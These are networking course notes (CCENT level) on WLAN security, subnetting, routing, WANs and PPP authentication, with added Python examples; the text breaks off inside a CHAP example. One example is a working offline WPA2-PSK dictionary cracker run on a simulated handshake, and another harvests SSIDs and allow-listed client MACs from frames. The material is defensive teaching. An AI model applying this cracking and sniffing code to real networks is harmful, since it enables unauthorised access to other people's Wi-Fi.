Service Set Identifier (SSID)

• When you configure a name for your WLAN, you've just configured an SSID. The SSID theory is simple enough - if the wireless client's SSID matches that of the access point, communication can proceed. The SSID is case-sensitive and it has a maximum length of 32 characters. Note that a matching SSID is not authentication: anyone can configure any SSID on a client.

• A laptop can be configured with a null SSID, resulting in the client basically asking the AP for its SSID; if the AP is configured to broadcast its SSID, it will answer and communication can proceed.

• If that broadcasting is disabled, as it often is, the SSID must be statically defined on the client as shown in the previous example. Disabling the SSID broadcast is not a security control: the AP still sends the SSID in its probe responses, and clients send it in their probe requests and association requests, all in clear text, so anyone with a wireless sniffer sees it within seconds. Worse, clients configured for a hidden network probe for it by name everywhere they go, which leaks your SSID outside the office.

MAC Address Authentication

• During your CCNA studies, you learned about a Cisco switch feature called port security. That feature allows a device to use a switch port only if its MAC address is considered secure for that particular port. There are WLANs set up to use MAC addresses in a similar fashion.

• Basically, the AP keeps a list of secure MAC addresses; devices with a secure MAC address can authenticate successfully, while those with a non-secure MAC cannot. Treat this as an administrative convenience, not a security control: MAC addresses travel in the clear in the header of every 802.11 frame, so an attacker can sniff an allowed address and clone it onto their own card in a couple of commands.
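Here is an added example, not from the course, of what a sniffer actually gets to see. It parses 802.11 management frames (the 24-byte header and the element-ID / length / value information elements that follow) from a constructed capture: a beacon from an AP with SSID broadcast disabled, the probe request a client sends to find that hidden network, the AP's probe response, and the client's association request. The MAC addresses, the SSID "CorpNet" and the capability and rate values are made up for the example, and the frames carry no FCS.

```python
import struct

# 802.11 management frame subtypes used in the constructed capture below
MGMT_SUBTYPES = {0: "assoc-req", 4: "probe-req", 5: "probe-resp", 8: "beacon"}
# Bytes of fixed fields that precede the information elements in each subtype's body
FIXED_BODY_LEN = {"assoc-req": 4, "probe-req": 0, "probe-resp": 12, "beacon": 12}
SSID_IE = 0  # element ID of the SSID information element


def mac(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


def build_mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes,
                     fixed: bytes, ies: list) -> bytes:
    """Build a management frame: 24-byte header, fixed fields, then TLV information elements (no FCS)."""
    frame_control = struct.pack("<H", subtype << 4)  # protocol version 0, type 0 = management
    header = frame_control + b"\x00\x00" + da + sa + bssid + b"\x00\x00"  # duration, addrs, seq ctrl
    body = fixed + b"".join(bytes([eid, len(val)]) + val for eid, val in ies)
    return header + body


def parse_ies(data: bytes) -> dict:
    """Walk the element-ID / length / value list; reject a truncated element rather than guessing."""
    ies = {}
    pos = 0
    while pos + 2 <= len(data):
        eid, length = data[pos], data[pos + 1]
        value = data[pos + 2:pos + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        ies.setdefault(eid, []).append(value)
        pos += 2 + length
    return ies


def parse_mgmt_frame(frame: bytes) -> dict:
    """Return subtype, source address, BSSID and SSID (bytes, or None if no SSID element)."""
    if len(frame) < 24:
        raise ValueError("frame shorter than a management header")
    frame_control = struct.unpack_from("<H", frame, 0)[0]
    if (frame_control >> 2) & 0b11 != 0:
        raise ValueError("not a management frame")
    subtype = MGMT_SUBTYPES.get((frame_control >> 4) & 0xF)
    if subtype is None:
        raise ValueError("unsupported management subtype")
    sa, bssid = frame[10:16], frame[16:22]
    ies = parse_ies(frame[24 + FIXED_BODY_LEN[subtype]:])
    ssid = ies[SSID_IE][0] if SSID_IE in ies else None
    return {"subtype": subtype, "sa": mac(sa), "bssid": mac(bssid), "ssid": ssid}


def ssids_seen(frames) -> set:
    """Every non-empty SSID in the capture, no matter which frame type carried it."""
    return {f["ssid"].decode("utf-8", "replace")
            for f in map(parse_mgmt_frame, frames) if f["ssid"]}


def client_macs_seen(frames) -> set:
    """Source addresses of frames that clients sent: exactly what a MAC-filter bypass needs."""
    return {f["sa"] for f in map(parse_mgmt_frame, frames)
            if f["subtype"] in ("probe-req", "assoc-req")}


# Constructed sample capture (not real traffic): an AP with SSID broadcast disabled
# and one client that is on its MAC allow-list.
AP = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("66778899aabb")
BROADCAST = b"\xff" * 6
RATES_IE = (1, bytes([0x82, 0x84, 0x8B, 0x96]))
BEACON_FIXED = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)  # timestamp, beacon interval, capabilities

HIDDEN_BEACON = build_mgmt_frame(8, BROADCAST, AP, AP, BEACON_FIXED, [(SSID_IE, b""), RATES_IE])
PROBE_REQ = build_mgmt_frame(4, BROADCAST, CLIENT, BROADCAST, b"", [(SSID_IE, b"CorpNet"), RATES_IE])
PROBE_RESP = build_mgmt_frame(5, CLIENT, AP, AP, BEACON_FIXED, [(SSID_IE, b"CorpNet"), RATES_IE])
ASSOC_REQ = build_mgmt_frame(0, AP, CLIENT, AP, struct.pack("<HH", 0x0411, 10),
                             [(SSID_IE, b"CorpNet"), RATES_IE])
CAPTURE = [HIDDEN_BEACON, PROBE_REQ, PROBE_RESP, ASSOC_REQ]

if __name__ == "__main__":
    for frame in CAPTURE:
        print(parse_mgmt_frame(frame))
    print("SSIDs leaked:", ssids_seen(CAPTURE))
    print("allow-listed MACs observed:", client_macs_seen(CAPTURE))
```

The hidden beacon yields an empty SSID, but the other three frames hand over the name, and every client frame carries its source address in the clear, which is all a MAC-filter bypass needs. The parser refuses a truncated element instead of guessing; that matters once you point it at real captures, because malformed information elements are a classic input for crashing careless parsers.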

WEP, WPA, And WPA2

• These three WLAN security standards are the result of two evolutions:
– WEP came first
– WPA evolved from WEP
– WPA2 evolved from WPA

• There are significant differences between the three, so let's take a look at each while comparing them at the same time.

• Wired Equivalent Privacy (WEP) has some real problems:
– The 24-bit initialization vector (IV) is sent in clear text with every frame, and it is so short that IVs repeat on a busy network, which exposes the RC4 keystream
– Static keys: every station shares the same key, it never changes, and because it's typed in by hand it's usually short and easy to guess
– One-way authentication (client does not authenticate the AP, making it easier for rogue access points to infiltrate the WLAN)
– The encryption scheme is very easily broken: with enough captured frames, off-the-shelf tools recover the key in minutes

• WEP supports two forms of authentication, open and shared key. Open authentication is pretty much what it sounds like - the virtual door to an AP is wide open. Any device can authenticate and then open communication with the AP. According to Cisco's website, if both devices are using WEP but the key on the client does not match that of the AP, authentication will succeed but data cannot be successfully passed. Counter-intuitively, shared-key authentication is the weaker choice: the AP sends a clear-text challenge and the client returns it WEP-encrypted, so anyone sniffing both messages gets a chunk of keystream for free. Cisco recommends open authentication even when WEP is in use.

• The next step in WLAN security was Wi-Fi Protected Access (WPA). WPA was designed to run on most wireless NICs that supported WEP, usually after a driver or firmware update, but you may have trouble running it on legacy (old) APs. If you can't run WPA on your APs, it's time to get some new APs.

• WPA's strengths:
– Two-way authentication - AP authenticates the client, client authenticates the AP
– Dynamic keys and a stronger encryption scheme through use of Temporal Key Integrity Protocol (TKIP, "tee-kip")
– WPA uses an 8-byte Message Integrity Check (MIC), sometimes called "Michael", to protect against replay attacks, spoofing, and man-in-the-middle attacks.
– WPA uses 802.1X (an EAP method plus a RADIUS server, "WPA-Enterprise") or pre-shared keys (PSK, "WPA-Personal") for authentication

• Some additional details regarding TKIP:
– The use of TKIP made it possible to use legacy ("old") hardware that had originally been created with WEP in mind.
– Both WEP and TKIP use the RC4 stream cipher for encryption, but TKIP protects RC4 keys via per-packet key mixing, which results in every packet having a unique encryption key, and it extends the IV to a 48-bit sequence counter so that it does not repeat.
– TKIP was always meant as a stopgap; it has since been deprecated, and WPA2's AES-based CCMP is what you should be running.

• WPA-PSK requires the use of a passphrase rather than a short password. A passphrase is 8 to 63 printable ASCII characters, and the recommended length is 20 - 30 characters, which will immediately have some users running WEP simply because WEP allows a short password to be configured.

• There are other potential issues with WPA:
– There's always the legacy issue to consider when it comes to backwards compatibility, but at this point, you should strongly consider replacing WLAN equipment that does not support WPA or a later, stronger solution.
– There's a potential issue with "Michael" (MIC). When an access point running TKIP sees two frames with a bad MIC within 60 seconds, its countermeasures shut down TKIP traffic on the Basic Service Set for 60 seconds. A DoS attack specifically designed to trigger Michael's countermeasures can take advantage of this behavior.

• Another potential issue lies with the use of pre-shared keys (PSK). The passphrase itself never crosses the air, but the four-way handshake that a client and AP perform when the client joins does, and it contains enough material for an attacker who captured it to test candidate passphrases offline. If a short passphrase is allowed, a dictionary attack run against that capture will compromise it.
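To make the offline attack concrete, here is an added worked example in Python. It is not code from the course; it follows the 802.11i derivations (PBKDF2-HMAC-SHA1 for the PMK, the HMAC-SHA1 PRF for the PTK, and HMAC-SHA1 for the WPA2 EAPOL-Key MIC). The SSID, the two MAC addresses, the wordlist and the simulated handshake are all constructed for the example: simulate_handshake plays both the AP and the client, and crack_psk plays the attacker who captured message 1's ANonce and message 2.

```python
import hashlib
import hmac
import os
import struct


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: the 256-bit PMK is PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range((length + 19) // 20))
    return b"".join(blocks)[:length]


def derive_kck(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF(PMK, both MACs and both nonces, all visible in the handshake); its first 16 bytes are the KCK."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Byte layout of an EAPOL-Key frame: EAPOL header (4), descriptor type (1), key info (2),
# key length (2), replay counter (8), nonce (32), IV (16), RSC (8), key ID (8), MIC (16), ...
NONCE_OFFSET = 17
MIC_OFFSET = 81


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal message 2 of the four-way handshake (client -> AP) with a zeroed MIC field. Constructed, not captured."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1), pairwise key, MIC bit set
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + struct.pack(">H", 0))
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL version 2, type 3 = EAPOL-Key


def with_mic(frame: bytes, mic: bytes) -> bytes:
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def simulate_handshake(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes):
    """Both ends of the exchange: the AP picks ANonce (message 1), the client answers with SNonce and a MIC (message 2)."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = derive_kck(wpa_psk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    msg2 = build_eapol_msg2(snonce)
    return anonce, with_mic(msg2, eapol_mic(kck, msg2))


def crack_psk(ssid: str, ap_mac: bytes, client_mac: bytes, anonce: bytes, msg2: bytes, wordlist):
    """The attacker: one PBKDF2 per candidate, then one PRF and one HMAC to test it against the captured MIC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    zeroed = with_mic(msg2, b"\x00" * 16)
    for candidate in wordlist:
        kck = derive_kck(wpa_psk(candidate, ssid), ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


# Constructed values for the example: not a real network and not a real wordlist.
SSID = "CorpNet"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
WORDLIST = ["password", "letmein1", "corpnet1", "Summer2007", "welcome1"]

if __name__ == "__main__":
    anonce, msg2 = simulate_handshake("Summer2007", SSID, AP_MAC, CLIENT_MAC)
    print("recovered:", crack_psk(SSID, AP_MAC, CLIENT_MAC, anonce, msg2, WORDLIST))
    anonce, msg2 = simulate_handshake("wDq8!p3Lm#zR2vK7tY", SSID, AP_MAC, CLIENT_MAC)
    print("recovered:", crack_psk(SSID, AP_MAC, CLIENT_MAC, anonce, msg2, WORDLIST))
```

Each candidate costs one PBKDF2 (4096 SHA-1 rounds) plus two cheap HMACs, and none of it touches the network, so the only defences are a long random passphrase or moving to 802.1X, where there is no shared passphrase to guess. Nothing in the attack needed messages 3 or 4; the ANonce from message 1 and one captured message 2 are enough, and the SSID is the PBKDF2 salt, which is one more reason that hiding it buys nothing.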

• Here's what happened next:
– After WPA was ratified by the Wi-Fi Alliance, the IEEE came out with 802.11i.
– After the IEEE came out with .11i, the Wi-Fi Alliance came out with WPA2.

• The good news: .11i and WPA2 are fully compatible and interoperable; WPA2 is the Wi-Fi Alliance's certification of the 802.11i standard. The most important change is the encryption: WPA2 requires CCMP, which is built on AES, in place of TKIP's RC4, and CCMP also replaces Michael with a cryptographic integrity check.

• That's about it for this introduction to WLANs! I've probably gone into more detail here than you'll need for the CCENT, but with wireless LANs growing rapidly in popularity, you need to know as much about WLANs as you possibly can.

• You will see more about WLANs in your CCNA studies, but even if you choose not to progress past the CCENT, do yourself a favor and continue your studies of wireless networking. Your career will thank you for it!

Video 9: Binary Math and Subnetting

Binary Math and Subnetting

• “The Secret” (Of Binary Success, That Is)
• Decimal > Binary, Binary > Decimal
• Subnetting Basics
• Calculating Number of Valid Subnets
• Prefix Notation
• Calculating Number of Valid Hosts
• Calculating Number of Valid IP Addresses in a Given Subnet
• Calculating the Subnet Number of a Given IP Address
• Meeting Stated Design Requirements

• Class A: 1 - 126, 8 NW Bits, 24 Host Bits, default mask 255.0.0.0
• Class B: 128 - 191, 16 NW Bits, 16 Host Bits, default mask 255.255.0.0
• Class C: 192 - 223, 24 NW Bits, 8 Host Bits, default mask 255.255.255.0

• Determining The Number Of Valid Subnets
– Number of subnets = 2 raised to the number of subnet bits
– Now here's the interesting part: You *may* need to subtract 2 from that result to get the correct answer.
• You should subtract 2 from the result if:
– You see the no ip subnet-zero command in the configuration. This command will appear near the top of the router configuration.
– The routing protocol is classful, and that means RIPv1 or IGRP.

• You should not subtract 2 from the result if:
– The classless protocols RIPv2, EIGRP, or OSPF are in use.
– The term "VLSM" for "Variable-Length Subnet Masking" is used.

• The ip subnet-zero command appears in the configuration. This is the default setting, and you'll see it near the top of the router configuration:

username R1 password 0 CCNA
ip subnet-zero
no ip domain-lookup

• A security aside on that snippet: username R1 password 0 CCNA stores the password in clear text in the configuration (the 0 means "unencrypted"), where anyone who can read a show run or a backed-up config gets it. Use username R1 secret CCNA instead, which stores a hash rather than the password itself, and don't count on service password-encryption to fix it, since its type 7 encoding is trivially reversible.

Prefix Notation

• Prefix notation is a quicker way of stating what the subnet mask of a network is. Note that the subnet mask consists of a number of consecutive 1s. Prefix notation is simply a slash followed by the number of 1s in the subnet mask. The subnet mask 255.255.255.0 is instead referred to as “slash 24” when spoken, or “/24” when written. This is the generally accepted way subnet masks are spoken and written about.

• Review the rules for network, subnet, and host bits:

A. The rules for Class A, Class B, and Class C determine the network portion.
B. Compare the remaining bits of the default and actual mask. The portion where the Default Mask and Subnet Mask both have zeroes is the host bits portion of the address.
C. The remaining bits - where the Default Mask has zeroes but the Subnet Mask has ones - are the subnet bits. These are the bits that are being "borrowed" from the host bits.

• Determining The Number Of Valid Hosts
– To determine the number of valid hosts, a somewhat similar formula is used:
• Valid Hosts On A Subnet = (2 raised to the number of host bits) – 2
– Thankfully, we always subtract the two when determining the number of valid hosts on a subnet: one for the subnet number and one for the broadcast address.

• Determining The Subnet Number Of A Given IP Address
– Given an IP address and subnet mask, determining the subnet it resides on is accomplished by performing a Boolean AND operation. First, the IP address and its subnet mask are converted to binary. The Boolean AND is simply a bit-by-bit comparison of the address and the subnet mask.
– If both bits are 1, the result of the Boolean AND is 1. If a 0 is set for that bit on either the subnet mask or IP address, or both, the result of the AND is a 0.

• Determining The Range Of Valid Host Addresses On A Subnet

• To determine the range of valid host addresses on a subnet, first determine how many overall host addresses are on that subnet. The first address in the range is the network number and is not a valid host address; the final address in the range is the broadcast address for that subnet and is not a valid host address. All addresses between the two are valid host addresses.

Meeting Stated Design Requirements

• Consider this question:
– “Your network uses Class B network 165.10.0.0. You need at least 150 subnets that have no more than 200 hosts apiece. Which of the following subnet masks should you use?”
– Remember the formulas for determining the number of subnets, or the number of valid hosts per subnet:
• Number of subnets = (2 to the nth power), where n equals the number of subnet bits.
• Number of valid hosts on a subnet = (2 to the nth power) – 2, where n equals the number of host bits.
– Work both constraints: 150 subnets need 8 subnet bits (2^7 = 128 is too few, 2^8 = 256 is enough), and 200 hosts need 8 host bits (2^8 – 2 = 254). 16 network bits plus 8 subnet bits is /24, or 255.255.255.0.

Watch Out For Overlapping Networks!

• You could see something like this on your exam, but this word of advice is valuable for your real-world experiences - when you're building on someone else's subnetting scheme, watch out for overlapping networks.

• By overlapping networks, I mean two subnets in the same network that are "overlapping" and therefore using a few of the same IP addresses.

• This is particularly true when you're left with a few address blocks from a subnetting scheme that you didn't create. Let's use the following network for an example.

• 50-host network address range: 10.1.1.65 - 10.1.1.126 (that is, 10.1.1.64 /26)

• Range for 10.1.1.0 /25 network: 10.1.1.1 - 10.1.1.126 - Overlaps With Preexisting Subnet!

• Range for 10.1.1.128 /25 network: 10.1.1.129 - 10.1.1.254 - Does Not Overlap With The 50-host network.
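Here is an added Python worked example (not from the course) that carries out the subnetting rules above: the Boolean AND for the subnet number, the broadcast address and valid host range, the 2^n and 2^n – 2 counts with the ip subnet-zero adjustment, the design question about 165.10.0.0, and the overlap check on the 10.1.1.0 blocks. The addresses are the ones from the examples above; the function names are my own.

```python
import ipaddress

# Default network bits by address class (first octet 1-126, 128-191, 192-223)
CLASS_NETWORK_BITS = {"A": 8, "B": 16, "C": 24}


def address_class(addr: str) -> str:
    first = int(addr.split(".")[0])
    if 1 <= first <= 126:
        return "A"
    if 128 <= first <= 191:
        return "B"
    if 192 <= first <= 223:
        return "C"
    raise ValueError(f"{addr} is not a classful unicast address")


def to_int(dotted: str) -> int:
    return int(ipaddress.IPv4Address(dotted))


def to_dotted(value: int) -> str:
    return str(ipaddress.IPv4Address(value))


def binary(dotted: str) -> str:
    """Dotted decimal to dotted binary, for doing the AND by eye."""
    return ".".join(f"{int(octet):08b}" for octet in dotted.split("."))


def prefix_length(mask: str) -> int:
    """Count the 1s in the mask, rejecting a mask whose 1s are not contiguous (e.g. 255.0.255.0)."""
    m = to_int(mask)
    ones = bin(m).count("1")
    if m != (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF:
        raise ValueError(f"{mask} is not a valid subnet mask")
    return ones


def subnet_number(addr: str, mask: str) -> str:
    """The Boolean AND of address and mask, bit by bit, is the subnet number."""
    return to_dotted(to_int(addr) & to_int(mask))


def broadcast_address(addr: str, mask: str) -> str:
    """Set every host bit to 1: OR the address with the inverted mask."""
    return to_dotted(to_int(addr) | (~to_int(mask) & 0xFFFFFFFF))


def host_range(addr: str, mask: str) -> tuple:
    """Valid hosts are everything strictly between the subnet number and the broadcast address."""
    first = to_int(subnet_number(addr, mask)) + 1
    last = to_int(broadcast_address(addr, mask)) - 1
    return to_dotted(first), to_dotted(last)


def subnet_and_host_counts(addr: str, mask: str, subnet_zero: bool = True) -> dict:
    """2^subnet bits subnets (minus 2 under 'no ip subnet-zero' or a classful protocol), 2^host bits - 2 hosts."""
    prefix = prefix_length(mask)
    subnet_bits = prefix - CLASS_NETWORK_BITS[address_class(addr)]
    if subnet_bits < 0:
        raise ValueError("mask is shorter than the class default mask")
    host_bits = 32 - prefix
    return {
        "subnet_bits": subnet_bits,
        "host_bits": host_bits,
        "subnets": 2 ** subnet_bits - (0 if subnet_zero else 2),
        "hosts": 2 ** host_bits - 2,
    }


def mask_for_requirements(network: str, min_subnets: int, max_hosts: int):
    """First prefix that satis both constraints of a design question (it leaves the most host bits), or None."""
    network_bits = CLASS_NETWORK_BITS[address_class(network)]
    for prefix in range(network_bits + 1, 31):
        subnets = 2 ** (prefix - network_bits)
        hosts = 2 ** (32 - prefix) - 2
        if subnets >= min_subnets and hosts >= max_hosts:
            return prefix, to_dotted((0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF)
    return None


def overlaps(cidr_a: str, cidr_b: str) -> bool:
    """True if the two subnets share any address; strict=True refuses a host address posing as a network."""
    return ipaddress.ip_network(cidr_a, strict=True).overlaps(ipaddress.ip_network(cidr_b, strict=True))


if __name__ == "__main__":
    addr, mask = "10.1.1.70", "255.255.255.192"
    print(binary(addr), "AND")
    print(binary(mask), "=")
    print(binary(subnet_number(addr, mask)), subnet_number(addr, mask))
    print("hosts:", host_range(addr, mask), subnet_and_host_counts(addr, mask))
    print("design answer for 165.10.0.0:", mask_for_requirements("165.10.0.0", 150, 200))
    print("10.1.1.0/25 overlaps the 50-host block:", overlaps("10.1.1.64/26", "10.1.1.0/25"))
    print("10.1.1.128/25 overlaps the 50-host block:", overlaps("10.1.1.64/26", "10.1.1.128/25"))
```

The overlap check uses strict parsing, so "10.1.1.65/26" is rejected instead of silently becoming 10.1.1.64/26; that kind of sloppiness is exactly how overlapping subnets get added to an existing scheme. For the design question the first prefix satisfying both constraints is /24, the same answer as working the powers of two by hand.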

Video 10: Static Routing And RIP

Static Routing And RIP

• Static Routing Theory and Labs
• RIP Routing Theory and Labs
• “show ip protocols”, “show ip route rip”, “debug ip rip”, And More!

• For this example and all others in this course, the last octet of the IP address for any physical interface will be the router number. That's a good habit to get into for your home lab studies as well. For loopbacks, we'll use the router number for each octet.
– The networks used in this section:
– Frame Relay (Serial interfaces, all routers): 172.16.123.x /24
– R2's loopback interface: 2.2.2.2 /24
– R3's loopback interface: 3.3.3.3 /24

• We're going to use pings to test IP connectivity throughout this section. When you ping a remote IP address, you're sending five ICMP Echo packets to the IP address you specify. If we get five ICMP Echo Replies in return, you'll see five exclamation points, and that means you do have IP connectivity to the specified destination.

• WARNING: Do NOT practice debugs on a production network. Some debugs, especially debug ip packet, can overwhelm a router or switch CPU and render the device unable to route or switch.

• It's important to know how the debug output will look when things are running correctly, because that's the only way to know what you're looking for when things aren't running correctly. If you have a home lab, make sure to run plenty of debugs as you work - but never practice them at work.

• Since we're in the static routing section of the course, let's choose a static route! We use the ip route command to create static routes, and we actually have two more choices when it comes to static routes. We can create...
– A static route to a given host or destination network
– A default static route, which will be used when there is no other match in the routing table for a destination network

• At this point in the ip route command, you must specify one of these two values:
– The local router's exit interface (the interface type and number, NOT its IP address)
– The IP address of the next-hop router that we want to send the packet to

• When you send pings, it's not enough for the local router to have connectivity to the remote network - the downstream routers need connectivity to that remote network as well!

• The syntax for a default static route looks a bit odd, so be ready to identify it on the exam:

R1#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#ip route 0.0.0.0 0.0.0.0 172.12.123.2

• Both the destination network and the mask are all zeroes in a default static route. As with a "regular" static route, we have the option of configuring a next-hop IP address or the local router's exit interface.

• Default static routes serve two major purposes, one of which we've just seen - we can send data to networks that have no specific entry in the routing table. This also helps to keep routing tables concise and complete, and as you advance in your Cisco studies, you'll learn that it's important to control the size of the routing table while keeping it complete.

• Static routes have their place, but they're not terribly scalable. Scalability refers to a network feature or protocol's ability to remain useful without a great deal of manual intervention as the network grows, and it's a term you'll hear often in your Cisco studies and your real-world job.

• Static routes do not dynamically adapt to network changes, and they can be a pain to keep up with as your network grows. That's why they're not considered very scalable.

• A better choice for routing is the use of dynamic routing protocols. You've probably heard of one or more of the following:
– RIP (Routing Information Protocol)
– IGRP (Interior Gateway Routing Protocol)
– EIGRP (Enhanced Interior Gateway Routing Protocol)
– OSPF (Open Shortest Path First)

• There are two versions of RIP, and while you're almost always going to run the more recent of the two, you need to know about them both for the exams and just in case you do run into the original version in the field. We're going to use almost the same network we used in the static route discussion here in our RIP discussion, with the only difference being an additional loopback address, 1.1.1.1, added to R1.

• Why change the default? Version 1 is quite limited in that it is a classful protocol, while Version 2 is a classless protocol. This is one time when it's good to be classless!

• In your CCNA studies, you'll be introduced to manual route summarization and variable-length subnet masking (VLSM). I won't show you those advanced skills now because we need to concentrate on the basics, but I do want you to know that RIPv1 does not support either of those, while RIPv2 supports both.

• RIPv1: classful, no VLSM, no manual route summarization

• RIPv2: classless, VLSM support, manual route summarization support
– To force RIP to send and receive only v2 updates, use the version 2 command under the RIP process.

• The incoming update from R1's serial0 interface mentions "hops" several times, where the outgoing update mentions a "metric". They're actually the same thing.

• Both versions of RIP use hop count for their metric, a measurement of how far it is to a remote destination. That's a serious limitation for RIP when it comes to Wide Area Networks (WANs), because RIP will consider both paths in the following example to have the same metric.

Video 11: Wide Area Networks (WANs)

Wide Area Networks (WANs)

• Physical Side of WANs
• Directly Connecting Cisco Routers Via Serial Interfaces
• HDLC and PPP
• Intro to Frame Relay
• RFC 1918 Addresses, NAT and PAT
• Intro to ATM
• Modems and DSL Variations

The Physical Side Of WANs

• Going back to the previous illustration, one reason we refer to the WAN connection as a "cloud" is that we don't know exactly what hardware is in use in the WAN, and we're not responsible for it - that's up to the service provider, the company that sells WAN services such as Frame Relay.

• What we are responsible for are the routers you see in that diagram, and our routers are going to have to communicate with the service provider's network. The device that sits between our router and the provider's circuit is a channel service unit / data service unit, which thankfully is referred to as a CSU/DSU.

• At some point, the responsibility for the physical devices passes from us as network admins to the service provider. This is the demarcation point , typically referred to as the demarc point . In theory, the demarc point is easy to define; when you're arguing with the service provider on a Friday afternoon when everyone wants to go home, the exact location of the demarc point suddenly becomes a huge point of contention.

• Theoretically, the demarc point is found at the CSU/DSU. The cable leading from the CSU/DSU to the router and the CSU/DSU itself is considered to be the customer's equipment and responsibility. That's us! All cabling on the "other side" of the CSU/DSU, along with the hardware in the WAN cloud, is the service provider's equipment.

• The CSU/DSU fills the router in on a very important piece of information, the clock rate. When the CSU/DSU does this, it's basically telling the router "here's how quickly you can send and receive data". Later in this section, we'll simulate a point-to-point link on a Cisco router and you'll see the command that allows a Cisco router to give another router this vital information.

• When it comes to the clockrate:
– The Data Communications Equipment (DCE) provides the clockrate
– The Data Terminal Equipment (DTE) receives the clockrate. By default, a Cisco router acts as a DTE.

• We're going to discuss two common WAN protocols in just a moment, and I want you to see the show commands that verify these protocols. To do so, we're going to use a configuration that isn't common in real life, but is very common in home labs. We're going to use two Cisco routers that are directly connected at their Serial0 interfaces, which means that one must serve as the DCE. We also need a special cable, the aptly-named DTE/DCE cable.

• After connecting the cable to the respective routers, use show controller serial x to ensure the router sees the cable as a DCE or DTE. You will see a great deal more output than this when you run this command, but the information that's important to us right now is at the very top.

R3#show controller serial 1
HD unit 1, idb = 0x1C44E8, driver structure at 0x1CBAC8
buffer size 1524  HD unit 1, V.35 DCE cable

• Here's what show interface serial 1 on R1 reveals before the clockrate command is configured:

R1#show interface serial 1
Serial1 is up, line protocol is down
  Hardware is HD64570
  Internet address is 172.12.13.1/24
  MTU 1500 bytes, BW 1544 Kbit, DLY 20000 usec,
     reliability 255/255, txload 1/255, rxload 1/255
  Encapsulation HDLC, loopback not set

• When you see the physical interface up and the line protocol down, there's some kind of logical problem with the interface. In this case, the DTE side is not receiving the required clockrate. Once we do configure the clockrate on the DCE's Serial1 interface, the line protocol comes up and stays up. No reset or reload is needed.

• I know I've mentioned this already during the course, but this truly bears repeating as it's a fundamental rule of troubleshooting:
– If the interface shows as administratively down, it's simply shut down manually and needs to be opened.
– If the interface shows as down, there's a physical problem, perhaps a loose cable.
– If the interface is up but the line protocol is down, that means the interface is physically fine but there's a logical issue, generally an encapsulation mismatch or missing clockrate.

• Real-world hint: If you're troubleshooting a line protocol issue and you see the line protocol come up, make sure to stick around for a minute and make sure it stays up. Also, the line protocol may show as up for about 20 seconds or so after you first open a Serial interface, but stick around and make sure it stays up.

• HDLC and PPP are the two data-link (Layer 2) protocols to consider when choosing an encapsulation method across a serial point-to-point link.

• The version of HDLC that runs on Cisco routers is Cisco-proprietary, making it unsuitable for multivendor environments. If RouterA is a Cisco router running HDLC, the only way the line protocol can come up is if the remote router is also a Cisco router running HDLC.

• There are major points of distinction between the two. First, HDLC is the default encapsulation for a Cisco serial interface. Here's the output of show interface serial 1 from the previous discussion. The encapsulation is defaulting to HDLC.

• PPP allows data compression to be configured, where HDLC does not. Compression is performed on data before it's sent across the WAN, so the same data uses less bandwidth on the link.

• PPP multilink allows multiple physical channels to be bundled into a single logical channel. HDLC offers no multilink capability.

• PPP allows the use of two authentication schemes on point-to-point links, PAP and CHAP; HDLC supports neither. The two are not equal: PAP sends the username and password across the link in clear text, while CHAP proves knowledge of the shared secret with a hash of a random challenge and never sends the secret itself. Use CHAP.
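The CHAP exchange just described, worked through in Python as an added example. This is not code from the course or from Cisco; the MD5 construction is the one RFC 1994 specifies (Response = MD5(Identifier || secret || Challenge)). The shared secret, the peer name and the pap_request helper are constructed for illustration.

```python
import hashlib
import hmac
import os


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 CHAP with MD5: Response = MD5(Identifier || secret || Challenge)."""
    if not 0 <= identifier <= 255:
        raise ValueError("the CHAP identifier is a single octet")
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapAuthenticator:
    """The router that demands authentication: it issues a fresh random challenge per attempt and keeps the secret."""

    def __init__(self, secret: bytes):
        self.secret = secret
        self.identifier = 0
        self.outstanding = None  # (identifier, challenge) of the attempt in progress

    def challenge(self) -> tuple:
        self.identifier = (self.identifier + 1) & 0xFF
        self.outstanding = (self.identifier, os.urandom(16))
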